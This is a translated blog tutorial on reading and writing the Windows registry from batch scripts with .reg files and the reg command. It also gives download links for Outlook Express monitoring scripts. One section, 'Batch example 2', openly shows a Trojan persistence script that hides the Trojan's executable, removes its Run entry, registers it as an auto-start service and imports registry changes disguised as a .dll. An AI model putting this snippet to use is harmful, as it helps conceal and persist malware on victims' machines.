Complete guide to operating the registry from batch files (reading the registry, writing the registry, etc.)

Time:2020-3-27

I. Generating .reg files from a batch script to operate the registry
In a batch file you can easily generate a .reg file with the redirection operators, and then execute that .reg file with a command.
The important thing here is to understand how .reg files operate on the registry.
The first line of the .reg file must be: Windows Registry Editor Version 5.00. After that comes the registry content to be operated on.
(This is the same format as files exported from the Registry Editor.)

1. Create a subkey
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\TTT]

This creates a subkey named "TTT" under HKEY_LOCAL_MACHINE\SOFTWARE\.

2. Create values

The code is as follows:
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
  "Name"="TTT BLOG"
  "EMail"="[email protected]"
  "URL"="http://www.taoyoyo.net/ttt/"
  "Type"=dword:02

This creates four new values under [HKEY_LOCAL_MACHINE\SOFTWARE\TTT]: Name, EMail, URL and Type.
Name, EMail and URL are of type "string value" (REG_SZ).
Type is of type "DWORD value" (REG_DWORD).

(Attachment: Windows registry value types:
REG_SZ          string value
REG_BINARY      binary value
REG_DWORD       DWORD value
REG_MULTI_SZ    multi-string value
REG_EXPAND_SZ   expandable string value)

3. Modify a value
Modification is straightforward: export the key you need to modify, edit it with Notepad, and then import it again (regedit /s), exactly as when creating a new one. You can modify several values under the same subkey at once.

4. Delete a value

The code is as follows:
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
  "EMail"=-

After executing this script, the "EMail" value is deleted.

5. Delete a subkey

The code is as follows:
  Windows Registry Editor Version 5.00
  [-HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
  [-HKEY_LOCAL_MACHINE\SOFTWARE\DDD]

After executing this script, the subkeys TTT and DDD are deleted.

6. Ways to execute a .reg file
1) Run the .reg file directly
2) regedit /s *.reg (/s suppresses the confirmation prompt)
3) reg import *.reg

7. In fact, the file does not have to be named .reg: regedit /s imports a file with any extension (for example .dll) as long as its content is in .reg format.

Batch example 1:

The code is as follows:
  @echo off
  echo Windows Registry Editor Version 5.00 >t1.reg
  echo.>>t1.reg
  echo [HKEY_LOCAL_MACHINE\SOFTWARE\TTT] >>t1.reg
  echo "Name"="TTT BLOG" >>t1.reg
  echo "EMail"="[email protected]" >>t1.reg
  echo "URL"="http://www.taoyoyo.net/ttt/" >>t1.reg
  echo "Type"=dword:02 >>t1.reg
  regedit /s t1.reg
  del /q t1.reg
  pause

Batch example 2: (this example is someone else's; I don't fully understand it ~~)
When using some older Trojans, a value is usually created under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] (or RunOnce, RunServices, RunExec) in the registry to make the Trojan start automatically. However, this easily exposes the Trojan's path, which leads to it being removed. Registering the Trojan as a system service is relatively safer. Take the configured IRC Trojan dsnx (named windrv32.exe) as an example:

The code is as follows:
  @start windrv32.exe
  @attrib +h +r windrv32.exe
  @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
  @echo "windsnx "=- >>patch.dll
  @sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
  @regedit /s patch.dll
  @del patch.dll
  @REM [delete dsnx's startup value in the registry, register it as a system service with sc.exe, set its attributes to hidden and read-only, and configure it to start automatically]
  @REM Isn't that safer?

II. Operating the registry with the reg command

The reg command is a dedicated registry tool provided by Windows. It can query, add, delete, import, export and compare conveniently. For details, see the help built into the system (reg /?).

REG Operation [Parameter List]
Operation [ QUERY | ADD | DELETE | COPY |
            SAVE | LOAD | UNLOAD | RESTORE |
            COMPARE | EXPORT | IMPORT ]

1. Query all values and subkeys

D:\>reg query hklm\software\TTT

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\software\TTT
Name REG_SZ TTT BLOG
EMail REG_SZ [email protected]
URL REG_SZ http://www.taoyoyo.net/ttt/
Type REG_DWORD 0x2

2. Query a specific value

D:\>reg query hklm\software\ttt /v url

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\software\ttt
url REG_SZ http://www.taoyoyo.net/ttt/

The hardest part here is extracting the string we want from the output. After a long time of confusion, we finally found a way.
There is no better way than intercepting what we need with find and a for loop. (If you don't understand the following example, see another article on this blog: DOS loop bat/batch for command details II.)
For example, to get the value of URL, http://www.taoyoyo.net/ttt/, you can use the following script:

The code is as follows:
  @ECHO OFF
  for /f "tokens=1,2,3,4,*" %%i in ('reg query "HKEY_LOCAL_MACHINE\software\ttt" ^| find /i "URL"') do SET "pURL=%%k"
  echo The URL value of TTT blog is: %pURL%

Save it as test.bat; the result is as follows:

D:\>test.bat
The URL value of TTT blog is: http://www.taoyoyo.net/ttt/
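The tokens=1,2,3,4,* / %%k approach above works for URL, but it would cut a value containing spaces, such as Name = "TTT BLOG", down to its first word. As an added example that is not part of the original post, the batch script below writes the Part I sample values with reg add instead of a generated .reg file, then reads each one back with /v and tokens=2,* so the whole data field survives; the key name HKCU\Software\TTT_Demo is an assumption chosen so the script runs without administrator rights.

```batch
@echo off
setlocal EnableExtensions
REM Added example, not from the original post. The key name is an assumption
REM (HKCU so no administrator rights are needed); it is removed at the end.
set "KEY=HKCU\Software\TTT_Demo"

REM /f overwrites without prompting; without /t the type defaults to REG_SZ
reg add "%KEY%" /v Name /d "TTT BLOG" /f >nul
reg add "%KEY%" /v URL  /d "http://www.taoyoyo.net/ttt/" /f >nul
reg add "%KEY%" /v Type /t REG_DWORD /d 2 /f >nul

call :GetValue "%KEY%" Name pName
call :GetValue "%KEY%" URL  pURL
call :GetValue "%KEY%" Type pType
echo Name = [%pName%]
echo URL  = [%pURL%]
echo Type = [%pType%]

REM clean up the demo key (/f suppresses the confirmation prompt)
reg delete "%KEY%" /f >nul
endlocal
exit /b 0

REM --- GetValue <key> <valuename> <outvar> ---
REM Queries a single value with /v, keeps only the output line that carries a
REM REG_ type (this drops the key-path header line), and takes everything after
REM the type column (token 2) as the data, so spaces in the data are preserved.
:GetValue
set "%~3="
for /f "tokens=2,*" %%A in ('reg query "%~1" /v "%~2" 2^>nul ^| find "REG_"') do set "%~3=%%B"
exit /b 0
```

With this approach the same subroutine reads REG_SZ and REG_DWORD values alike; for Type the data comes back as the hexadecimal string 0x2, exactly as reg query prints it.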

I don't know why, but on my home computer running the "reg" command (including reg /?) at the command line makes the CPU go to 100%. Looking at Task Manager, CMD takes more than 80%. I don't know why.
There is no problem running other commands, including regedit /s.

I searched, and some sources on the Internet say it is caused by a Trojan, but after checking it does not look like it. No files were found, and there is no problem running other commands.
I'll leave it for now. I have a detailed explanation of the reg command on hand; I'll sort it out later!

Because of the virus check, I used my own clear.bat to clean up the C drive and found 1 GB of space; there were only a few hundred MB left. What a lot of garbage Windows accumulates ~~ don't forget to clean it up regularly!

Two more batch files are available for automatically monitoring Outlook Express. If needed, click to download.
1. Oemonitorcount.bat: resets the count of how many times OE has been opened in the registry, to avoid the compaction prompt after it exceeds 100.
2. Oemonitorsize.bat: monitors the size of the Outlook Express mail files (*.dbx); when a file is larger than the specified size, an alarm log is generated.

Both files can be added to the Startup group so they run automatically at every boot!
They are mainly meant to solve some problems that often arise in the company:
1) some people's mail files often exceed several GB;
2) sometimes, after compacting as prompted, mail is lost.

I just found that the downloaded file has the suffix ".htm"; remove the suffix before using it!
Also, when downloading, please use the following links, i.e. the Qiannao Telecom high-speed download address and the Qiannao Netcom high-speed download address. The VIP link above is dedicated to Qiannao users~~